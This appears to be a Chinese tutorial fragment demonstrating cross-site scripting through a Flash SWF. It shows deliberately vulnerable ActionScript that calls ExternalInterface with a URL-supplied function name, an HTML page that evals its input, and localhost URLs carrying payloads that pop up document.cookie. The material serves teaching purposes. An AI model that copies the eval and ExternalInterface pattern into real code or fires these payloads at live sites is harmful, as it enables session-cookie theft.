示例:
创建一个测试flash,代码如下,导出swf文件
| //取m参数 var m=_root.m; //取showInfo参数 var showInfo=_root.showInfo; //调用html中Javascript中的m方法,参数为showInfo flash.external.ExternalInterface.call(m,showInfo); |
ExternalInterface
在HTML中引用flash:
| <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Flash XSS</title> </head> <script> function showInfo(info){ eval(info) } </script> <body> <embed src="test.swf?m=showInfo&showInfo=alert(document.cookie)" allowscriptaccess="always"></embed> <div id=info></div> </body> </html> |
成功执行执行攻击代码,弹出cookie。
上面演示的执行,其实还可以直接执行反射XSS。
由于Javascript中可以使用匿名函数function(){代码}进行执行。
如:
http://localhost:8080/JavaTest/xss/test.swf?m=function(){alert(/xss/)}&showInfo=s
成功弹出,试试弹出cookie。
http://localhost:8080/JavaTest/xss/test.swf?m=function(){alert(document.cookie)}&showInfo=s
没有弹出任何东西,因为这里没有document对象,这里我们利用location.href来生成HTML代码
http://localhost:8080/JavaTest/xss/test.swf?m=function(){location.href="javascript:'<script>alert(document.cookie)</script>'"}&showInfo=s
将攻击代码输入到HTML中了。
成功执行了弹出cookie。
